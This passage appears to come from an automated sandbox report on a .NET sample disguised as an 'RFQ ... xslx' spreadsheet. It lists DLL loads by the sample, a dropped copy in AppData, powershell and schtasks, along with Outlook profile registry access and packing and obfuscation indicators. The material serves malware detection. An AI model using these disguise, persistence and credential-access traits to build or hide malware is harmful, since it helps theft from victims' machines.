                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeSection loaded: edputil.dll
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, WXLXx86ylIQfeMsLR5.cs.Net Code: USmjbMq54i System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.288e26c.1.raw.unpack, wehuuoKhMKMbnQu72K.cs.Net Code: LOPk5OGwQvvejRfJl7n System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, WXLXx86ylIQfeMsLR5.cs.Net Code: USmjbMq54i System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_00E9D5C0 push eax; ret 0_2_00E9D5C1
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_06BF9850 pushfd ; iretd 0_2_06BF9879
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_014F9BD0 pushad ; ret 9_2_014F9BD1
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_06811658 push cs; retf 9_2_0681165B
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_0681B3C0 push es; ret 9_2_0681B3D0
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_071C4790 pushfd ; retf 9_2_071C4791
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_071C2A10 push es; ret 9_2_071C2A20
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_016DD5C0 push eax; ret 10_2_016DD5C1
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_07309850 pushfd ; iretd 10_2_07309879
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_00F29BD0 pushad ; ret 16_2_00F29BD1
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05EA1578 push cs; retf 16_2_05EA157C
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05EA1499 pushad ; retf 16_2_05EA149A
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05EA1658 push cs; retf 16_2_05EA165B
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05EAB3C0 push es; ret 16_2_05EAB3D0
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_06854790 pushfd ; retf 16_2_06854791
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_06852A10 push es; ret 16_2_06852A20
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exeStatic PE information: section name: .text entropy: 7.804264542022236
                      Source: ywKDUBCUA.exe.0.drStatic PE information: section name: .text entropy: 7.804264542022236
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, BXf6FBO8RUpjNfUvb9.csHigh entropy of concatenated method names: 'mhUvMcwqon', 'IAOviKPKa5', 'jVCvKk9uNr', 'oFFKIv2Q9E', 'dXpKz8YSZ4', 'Jn5vCtCapQ', 'HnPvGYHQkj', 'ntSvS3v78y', 'Cq5vnr57wd', 'vh1vjBwX4A'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, t0Q8xKg2Rt1VrenmFW.csHigh entropy of concatenated method names: 'H3VKfcptMI', 'ApxKDPuCVh', 'EVXKxXidVL', 'B17KvgMWAR', 'qajK6j4F0j', 'tG1xtnY5cL', 'G7GxwkLdQ7', 'b7gx9q8Hhc', 'LI2xJ2pehw', 'LxAxrJ6I2l'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, z4Lt9BGCCfMS3EUAYkN.csHigh entropy of concatenated method names: 'qE8Y8tgVAq', 'uWqY5QBjba', 'aZLYb8He3d', 'jWiY1hu1P4', 'CTjYkhxgjj', 'f8XYyke7OR', 'PrKYsOWfGw', 'dMJYqaOQRj', 'XV3YPGBv3x', 'hMUYUEnKXF'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, lMgrnFqi5rRuM663RZ.csHigh entropy of concatenated method names: 'pJ6Da2IbYg', 'lhfDFycPY9', 'POqDVajNoF', 'SwfDuqA7o3', 'AMHDtuun4L', 'HTLDwE1eKA', 'oJfD9IEfqC', 'lodDJMpIVO', 'wSiDr85Lhv', 'xpSDIV9aPF'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, qrKNNWIs1iYM2TK7gp.csHigh entropy of concatenated method names: 'gWoYGhdVAx', 'nCHYn3uVIJ', 'Rn7Yj1uD02', 'TAeYMdTIya', 'kv9YDgKdyO', 'W7mYxm78GO', 'm3lYKARpgE', 'q5q09vm0n9', 'rTq0JqQKOj', 'aU80rUDyVJ'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, uwv9tXGnDnUKhCEBhfI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VY9RaHt1RX', 'tZeRFu2b5W', 'in6RVpfY3K', 'l2XRuY1cMa', 'omDRt5qpFk', 'FmYRwbvEw2', 'Tr1R9N3amn'
